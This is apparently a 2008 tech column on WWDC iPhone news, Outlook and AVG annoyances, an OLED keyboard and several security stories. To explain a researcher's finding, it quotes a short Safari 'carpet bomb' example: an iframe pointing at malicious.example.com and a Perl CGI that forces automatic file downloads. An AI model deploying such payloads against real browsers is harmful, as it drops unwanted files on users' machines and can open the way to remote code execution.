The WWDC announcements were generally as expected: a 3G iPhone, cheaper prices, GPS, and some impressive third-party applications. Selling apps on the iTunes store makes perfect sense, and I'm hopeful that prices will start and remain low ($10-$20) and that there will also be a thriving freeware app channel. Apple isn't requiring that developers sell their applications, and I suppose there may be some danger that junk will clog up the channel, but it probably won't be as bad as how cluttered the iTunes podcast listing became. There are still some unanswered questions about this, though--will Apple be a harsh gatekeeper? Will it be inclusive or exclusive? It is good that Apple won't be charging developers a fee to process credit card sales, but I'm not surprised. The accounting for that could have been a nightmare to handle, so why bother? Apple will be making three dollars on a ten dollar app, which is more than enough to cover expenses (and a lot better profit than on a $1 song), so I fully expect this to become a decent profit center for the company. Apps will be FairPlay DRM'd, but I wonder how long it will take for someone to break that. Apple will also let you distribute your own application to up to 100 iPhones on an "ad hoc" basis (Steve's example was a college professor teaching a class in iPhone programming who wants all his students to distribute their example apps to each other). Bottom line, though, is that despite these options Apple is still maintaining very strict control over application distribution. I won't be surprised if people bypass that relatively soon. The FairPlay DRM might be a brief obstacle.

Their enterprise delivery system looks good, allowing a company to control installation of apps to its own phones. It seems to me that Apple is pursuing the enterprise market with great enthusiasm, Some people may call the BlackBerry a "CrackBerry," a reference to the highly addictive drug "Crack," but I don't really see the attraction. A couple of friends had them and gave them up, and the few minutes I spent with one didn't hook me. I probably didn't give it enough time, but now that I have an iPhone and an even better model is on they way, I see no reason to spend time with one. It is rather amusing, though, that BlackBerry's new "Bold" (model 9000) has more than a passing resemblance to an iPhone (http://www.blackberry.com/blackberrybold/). In fact, it sure looks like it wants to be an iPhone, with its black face and chrome edging. Its screen has the same 480x320 resolution but is a lot smaller. But of course its not touch-sensitive. It has some nice features, including a regular keyboard, but it is both "blah" and expensive.

I'm glad to see Apple once again showing off Interface Builder. Scott Forstall, Vice President of "Platform Experience" at Apple, gave an IB demo very much like one I gave many times so many years ago, dragging out some controls and showing how you can rearrange them and connect them together, and run the app instantly for UI testing. And that was a common theme for many of the developers who showed their applications: it is quick and easy to develop for the iPhone.

It was interesting to see two different applications from competing organizations. One is TypePad and the other is Mobile News Network from the Associated Press. On the one hand, we have a blogging application, representing the somewhat iconoclastic "bloggosphere," and an app from one of the oh-so-very mainstream media (MSM) companies. I suppose there's a place for both, but I prefer to get my news from the bloggers. Does the iPhone have the potential to become a major news reporting tool? Not until there are a lot more of them out there, and video capture becomes more widely supported (there is a hack that does that now, but we have to see what such applications, if any, Apple will allow). Come to think of it, it is only a matter of time until some of the dating sites release software that alerts you if you are close to a subscriber who meets your criteria for an emotional relationship.

"Band" looks pretty neat, and reminds me of one of the first applications distributed for NeXTSTEP so many years ago. It too was a music player, more like a sequencer than a music pseudo-instrument, and now in Band we have a far more sophisticated, handheld music maker! I'm not a sports fan, but one thing about the application from Major League Baseball (MLB.com) makes me wonder: it will play video clips that MLB.com will make available just minutes after the play, not hours after the game. The implication is that these clips are streamed, not downloaded. In the demo, the speaker looked at a page of statistics, then switched to a page of image thumbnails, pressed one, and the video began to play. I suppose they could have downloaded these clips earlier for playback during the demo, but that wasn't my impression.

Apple appears to have addressed one of my main concerns, that of application persistence. When you quit an app on an iPhone, it really quits completely. This saves battery life and improves performance, sure, but inhibits some functionality. Apple didn't want people to have to fool around with task managers, however, which would likely be a necessary evil consequence of running apps in the background. Scott showed a screenshot of the task manager in what appeared to be Windows Mobile and remarked, "This is nuts." It got a decent laugh from the audience, of course. So rather than background apps, Apple has built an alert push api that lets developers trigger a "badge" (a number over an app icon, like an e-mail/voice message/SMS count), or a sound, or an alert panel with buttons. The only problem I see is that it requires a persistent IP connection from Apple to the phone. From an overhead standpoint, that isn't necessarily bad, but it means that you are tethered to Apple's servers to enjoy this functionality, and the only way to avoid it is probably to go into Airplane mode. No doubt some people are already trying to figure out how they can bring about a DOS attack on an iPhone, or many iPhones. The potential is there, and we'll all know more in September when it becomes available.

A few more nice features: searching contacts (finally), Word/Excel/Powerpoint document viewing, bulk mail deletes and moves. I sure hope they improved the iPod function, and web page caching. Multi-language support looks good, too. Drawing Chinese characters with the finger might work well. We'll see. Steve's remark that that is "one of the great advantages of not having a bunch of plastic keys for your keyboard" drew cheers, but anyone who has used an old Palm or HandSpring device knew that long ago. I sometimes wish I could enter characters using Grafitti or something similar.

MobileMe was probably the most important announcement at WWDC, though. Apple understands the importance of having our data wherever we are, the need to share it and push it wherever. I am hoping that Apple will offer an online word processor, spreadsheet, and so on like Google Docs, but I doubt it. Apple may be a hardware company, but the deliver a platform to run applications, not just a web browser. Still, I think I will dust off my expired .mac account and try out me.com (a domain which probably cost them a lot of cash).

More Microsoft Idiocy

Here's an example of sheer idiocy in Microsoft Outlook. Now to be fair, I am using Outlook 2003, but it isn't uncommon for corporate sites to use older versions of software because they are, well, just better than the latest one. So it might have been fixed in today's version, but from my perspective it should never have gone out the door this way: When you respond to a message with external content, Outlook sometimes says "To complete this action, Outlook must download content from a server other than your e-mail server. This could verify to the sender that your e-mail address is valid and increase the amount of junk e-mail you receive in the future." You then have three options: "Please do not show me this dialog again." "OK" and "Cancel." But where is the fourth option? "Do not download content but proceed with action" should absolutely be an option. Why on earth not? Why MUST Outlook download content from elsewhere? I see the message; I want to forward what I see; I don't want to forward anything else. Why can't Outlook just do that?

On Windows, you absolutely must install and frequently update some kind of anti-virus software. Although I'm sure that it works great for lots of people, I have heard nothing but horror stories about the mainstream virus killers like Norton AntiVirus. People accuse NAV of being bloatware, of interfering with other applications, of inhibiting connectivity, of being difficult to install and uninstall. I experienced some of those problems in the past, so a number of years ago I switched to Grisoft's AVG Free (http://free.avg.com/). It is a no-frills anti-virus package, and it works well. Recently, they updated to version 8.0. I had to jump through a few small hoops to upgrade to the free version, but it was a relatively painless process. During the install, however, it asked me if I wanted to use its LinkScanner function. AVG can analyze links in your web search results and warn you about possible phishing sites. A nice option, I guess, but I didn't want it. So I said no and proceeded with the installer. Imagine my surprise when my first visit to Google was slowed by AVG sending my results to their servers to be checked. And I couldn't simply turn off that function, because then the "dashboard" or whatever they call its controller utility turned red and reported an error, that it was not functioning properly. What kind of silliness is that? I turned it off. It wasn't malfunctioning. Why couldn't it just ignore that function? No, I had to hunt for an answer, and found it here:

• http://free.grisoft.com/ww.faq.num-1241

"How to install AVG without LinkScanner." I had to rerun the installation package from a command prompt:

c:\avg_free_stf_*.exe /REMOVE_FEATURE fea_AVG_SafeSurf /REMOVE_FEATURE fea_AVG_SafeSearch

Quite bizarre. I guess they really want people to use their SafeSearch function, but really, why should I? Google is very unlikely to return phishing sites in its results, and I don't want to share my searches with anyone.

Did I hear right that Steve Ballmer said recently that people should be happy to buy Vista because they can easily downgrade to XP? InformationWeek quotes him as having said "Customers get both... I don't know how you can do better than getting both." Apparently, Microsoft's license agreement lets you downgrade to XP, and Dell even sells some Vista machines that have been "pre-downgraded." How about that? The Vista disaster really is laughable.

Optimus Maximus

Finally, the mystical, mythical Optimus Maximus keyboard is shipping! Yes, for the fantastical low price of US$1,864.35 (US$1,589.99 from ThinkGeek.com), you too can have a keyboard with each key, 113 in all, a tiny OLED screen! Wow! You can make each key display whatever you want, on keys of 48x48 pixels in size and in any of 65,536 colors. You can even play a QuickTime movie or animated GIF in a key, or display an image that spans multiple keys. See http://www.artlebedev.com/everything/optimus/ for some pictures and search YouTube for a bunch of videos about it. It has been a long time coming, and for a while it seemed that it would never appear, but now that the proof of concept is here ("in stock") the technology will improve and the price will come down, and I expect that most if not all of our keyboards will eventually be OLED-based. I'm looking forward to that.

I should probably give Safari on Windows a try again, but security researcher Nitesh Dhanjani found that Safari's automatic downloading of unknown resources an be a problem. His example is straightforward. Supposing a web page contained this:

<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>

And suppose that cgi contained this:

#!/usr/bin/perl
print "Content-type: blah/blah\n\n"

Safari would download carpet_bomb.cgi automatically. With enough iframes, you can litter the Downloads directory or Windows desktop with unwanted files (hence the reference to "carpet bomb"). Another researcher, Aviv Raff, found that this Safari problem lets an attacker exploit an old IE bug to allow remote code execution. Microsoft has a workaround that reduces the danger, but still, it just goes to show that we always face some risk. (See http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html and http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx for more.)

But while some risks are real and deserve attention, some cries of "Danger!" sound more like "The sky is falling!" An Australian security researcher has warned that the iPhone will "elevate [corporate] risk to a level never seen before." Say what? "Never seen before"? I can see nothing more risky with the iPhone than any other mobile device with a Wi-Fi connection, from personal laptops to the BlackBerry 9000. Chris Gatford of Pure Hacking was quoted in InfoWorld as saying "We're going to find a lot of executives using the iPhone's push e-mail to combine their personal and business messages... combined with the ever-increasing use [on the iPhone] of Web 2.0 applications, there are a lot of vulnerabilities." Might as well just give up, eh? Better to just throw away all our computers. Or stick with something with no vulnerabilities, like Vista. Now THAT's something that "elevated risk to a level never seen before."

Speaking of risk, a friend of mine suffered a hack attack: his World of Warcraft account was taken over and all his items, as well as all the items from our guild bank, were stolen. He was fully outfitted with "epic" items and the thieves disenchanted all of them, leaving him naked (well, even "naked" characters still have underwear, and he put on the guild tabard to provide him a bit more modesty.) He might have been caught by a vulnerability in Flash Players prior to version 9.0.124.0, but he isn't sure. Both he and the guildmaster opened tickets with Blizzard and there is some chance that they will return the gear and guild items but there's no guarantee. Of course, it makes no sense for someone to suddenly transfer the contents of his bags and bank, and the contents of his guild's bank, and disenchant all his equipment and transfer that, to some random person. I'm sure that Blizzard has a record of the transactions, but they might still say "Tough luck."